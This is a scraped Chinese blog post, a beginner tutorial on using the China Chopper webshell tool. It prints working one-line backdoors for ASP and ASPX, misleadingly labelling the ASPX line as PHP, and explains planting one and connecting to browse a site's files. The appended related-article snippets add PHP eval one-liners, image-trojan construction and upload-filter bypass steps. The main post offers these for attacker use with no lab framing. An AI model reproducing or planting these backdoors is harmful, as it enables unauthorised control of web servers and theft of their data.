中国菜刀的使用

最新推荐文章于 2022-10-25 18:20:16 发布
最新推荐文章于 2022-10-25 18:20:16 发布
阅读量5.7k 收藏 16
点赞数 5
分类专栏: 网络安全博文 文章标签: 中国菜刀 shell asp php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lvoyee/article/details/13167903
版权

中国菜刀的使用,为自己和新手一起分享的。大牛看了勿喷!

        说到菜刀,我们第一想到的是一句话了。这里就说说一句话的类型,常常有的asp,aspx,php。


        asp一句话:<%eval request("pass")%>

        aspx一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>

        php一句话:<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>


       这里写的只是常见的,在各个类型中还衍生了许多的变种一句话,我们在使用的时候,更改里面的"pass"就可以了,例如asp一句话:<%eval request("123")%>,这里的密码就是123。aspx和php也是同理,改好对应的便可以用了。在这里 给大家一个建议,可以收集各类的一句话,分类别保存,在用到的时候就方便多了。

       在插入一句话后,我们接下来就是连接了。打开菜刀:在空白地方右击 选择添加,如下图


在“地址”这里填上你插入一句话的文件的地址,后边的那个小框填的是你的一句话的密码,其他的不用填, 填完之后单击“添加”,就可以了。添加完毕后,你的这个一句话的shell会显示到主界面里,右击它,选择“文件管理”,就可以看到网站上的文件了 。然后你可以做你想做的事了。

伊成
关注
专栏目录
菜刀的基本使用
ChenZIDu的博客
09-22 1528
看到随便上传,想到一句话木马,然后上传一个 <?php eval($_POST['a']); ?> 然后显示上传成功,点击进去查看发现 没有成功,他屏蔽了<?php,几个字符。 发现还有另一种JS(javascript)脚本风格的写法 <script language="PHP"> @eval($_POST["code"]); &lt...
菜刀的用法
小兴的学习笔记
12-13 1874
1.一句话木马 PHP //加容错代码 @eval($_POST['angel']) //绕过<?限制 //绕过某些限制 ASP ASPX 2.连接菜刀 如下图:右键--添加即可。 angel为 $_POST['angel']这里的angel相当于密码。 然后就可以操作了。 菜刀下载地址:菜刀
中国菜刀的作用详细介绍和使用说明(黑站神器与侧门运用检测工具)
xhlylxhl的博客
08-29 2180
中国菜刀,1个很好用而又强劲的webshell,它并不是用于切黄瓜的煮饭的道具哦,是这款技术专业的网址管理系统软件,尺寸只能300多KB,简直精巧好用啊!只有被犯罪分子运用到,就是说1个黑站的神器了。我还记得之前触碰的那时候探求了好长时间才用到,嘿嘿。。之后理解以后才发觉并不会太难实际操作,一起作用也比我想像的要强劲。 配置图: 注:独立的菜刀沒有实际效果,必须服务端有一段话侧...
中国菜刀使用教程
qq1140037586的博客
06-28 1501
中国菜刀使用教程
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
lza20001103的博客
08-13 5006
渗透测试-菜刀冰蝎蚁剑哥斯拉等webshell工具及特征分析
中国菜刀使用介绍
m0_37786014的博客
12-04 1745
一、简介 服务器只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。 目前支持的服务端脚本:PHPASP、.NET,并且支持、https安全连接的网站 在服务器端运行的代码如下: PHP:<?php @eval($_POST['pass'];?)> ASP:<%eval request("pass")%> ASP.NET:...
mysql中国菜刀连接_中国菜刀使用方法以及小技巧
weixin_34938347的博客
02-08 1860
相信大多数的站长都用FTP来管理web空间,但是相对于菜刀来说FTP简直弱到爆.就数据库管理方面来说,phpmyadmin和帝国软件只能管理mysql数据库,而且在软件的体积上跟菜刀完全没法比,如果精通SQL语法,何必还要PHPMYADMIN呢?而且中国菜刀以其特色图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS,支持ADO方式连接的数据库。服务端:在服务端运行的代...
中国菜刀使用(实战正确姿势)
weixin_49071539的博客
12-17 1万+
图片上传漏洞: ps:此教程为靶场实战,切勿用于非法用途 1. 准备制作图片马,随便找到一张图片重命名为1.jpg 2. 准备好一句话木马,这里我命名为1.php 3. 需要用到dos命令将两个文件合到一起,windows+R 输入cmd回车。找到存放文件的路径,输入命令:copy 1.jpg/b + 1.php/a 2.jpg文件夹中会自动生成一个2.jpg文件。 4. 选择上传2.jpg 5.上传,使用bp抓包更改后缀,将filename后面的.jpg改为.php,转发。 6. 可以看到上传
中国菜刀使用(图片上传漏洞)
m0_71088505的博客
07-03 1292
图片上传漏洞: ps:此教程为靶场实战,切勿用于非法用途 1.准备制作图片马,随便找到一张图片重命名为1.jpg 2.准备好一句话木马,这里我命名为1.php 3. 需要用到dos命令将两个文件合到一起,windows+R 输入cmd回车。找到存放文件的路径,输入命令:copy 1.jpg/b + 1.php/a 2.jpg 文件夹中会自动生成一个2.jpg文件。 4. 选择上传2.jpg 5.上传,使用bp抓包更改后缀,将filename后面的.jpg改为....
菜刀如何连接mysql_中国菜刀之终端操作及数据库管理
weixin_29798625的博客
02-10 2935
实验环境操作机:Windows XP目标地址:172.16.12.2实验目的认识中国菜刀工具熟练使用中国菜刀工具进行网站文件管理、数据库管理、使用虚拟终端等操作。实验内容内容预览尝试执行命令自定义终端路径配置数据库相关参数读取数据库信息和执行sql语句虚拟终端操作中国菜刀的虚拟终端功能其实是通过相应的脚本函数执行系统命令并取得返回信息。小i提示:在本次实验中,请注意实验工具、实验文件存放路径,不同...
中国菜刀使用与原理分析
热门推荐
weixin_45597678的博客
12-04 1万+
中国菜刀的功能 中国菜刀使用 原理分析
WebShell工具特征流量分析合集
最新发布
爱吃仡坨的Blog
10-25 1896
通过编码的数据包1特征,发现是URL编码(BP会自动对其解码显示)还可以通过解码网站对其进行解码,之后分析数据包特征如下图,发现通过蚁剑终端传参之后得到的响应包任然是明文的。
菜刀php教程,中国菜刀(chopper)功能介绍及使用教程
weixin_34774527的博客
03-09 5735
中国菜刀(下载地址:)是一个非常好用而又强大的webshell,它可不是用来切菜的做饭的道具哦,是一款专业的网站管理软件,大小只有300多KB,真是小巧实用啊!不过被不法分子利用到,就是一个黑站的利器了。我记得以前接触的时候摸索了好久才会用,哈哈。。后来领悟之后才发现并不难操作,同时功能也比我想象的要强大。注:单独的菜刀没有效果,需要服务器端有一句话后门,或漏洞,例如这样的:89/mingfang...
初始webshell+中国菜刀使用
m0_48222671的博客
04-18 5367
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 文章目录一、webshell是什么?二、木马三、中国菜刀 一、webshell是什么? “Web” 的含义是服务器开放web服务; "Shell"的含义是取得对服务器某种程度上的操作权限; "webshell"就是获取对服务器的控制权限,这就需要我们借助一些webshell管理工具和一些漏洞去得到这种权限。 二、木马 在我们使用webshell管理工具之前,需要先在目标服务器上传或创建一个木马文件 木马分为大马、小马和一句话木马: 小马:文.
WebShell连接工具(中国菜刀、WeBaCoo、Weevely)使用
悦分享
07-31 3413
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的aspphp木马,也有基于.NET的脚本木马与JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
重新学习--中国菜刀
diecai2192的博客
08-14 1325
1. 菜刀 (1)中国菜刀的请求方式为post。 (2)中国菜刀模拟了百度爬虫的user-agent,中国菜刀默认的连接中使用base64的方式进行编码传输,以便逃脱抓捕。 <?php eval($_POST['x']); ?> 客户端连接设置好URL,密码,连接。 一句话木马的核心就是: PHP eval() 函数 eval() 函数把字符串按照 ...
使用中国菜刀(结合一句话木马)通过Iiswriter的put方法getshell
wsnbbz的博客
12-30 3516
1.在客户端安装iiswrite软件,并关闭客户端防火墙 2.服务器安装iis,勾选以下选项 3.更改iis网站的主目录,将所有权限都勾选,再将网址的权限里来宾账户的权限改为完全控制 4.在客户机使用iiswrite对服务器所在文夹件上传一个txt文件并改后缀为asp,内容为<%eval(eval(chr(114)+chr(101)...
菜刀和一句话木马
weixin_44720762的博客
05-02 3863
中国菜刀,一个非常好用而又强大的webshell webshell就是以aspphp、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。 在博主本人看来,对于一名网安小白来说,这段解释对理解webshell没有丝毫帮助。webshell:web:网站 shell:命令语言。执行用户输入的命令或者说执行预先设定好的一连串的命令 也就是一种具有命令效果的网页代码,...
linux菜刀使用教程,中国菜刀使用教程
weixin_42514777的博客
05-05 1135
下载地址:x01介绍中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。UINCODE方式编译,支持多国语言输入显示。(引用于百度百科菜刀的界面:1305452-20180808210011001-1761784351.png (54.61 KB, 下载次数: 5)2019-9-26 17:...
Kali Linux中Dmitry与Weevely的使用教程
中国的“菜刀”工具相比,Weevely提供了更丰富的功能,但仅支持PHP后门的创建和管理。对于初学者来说,Weevely可能需要一定的学习曲线,因为它只提供命令行界面。 三、Weevely的使用步骤 1. 在Kali Linux终端启动...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值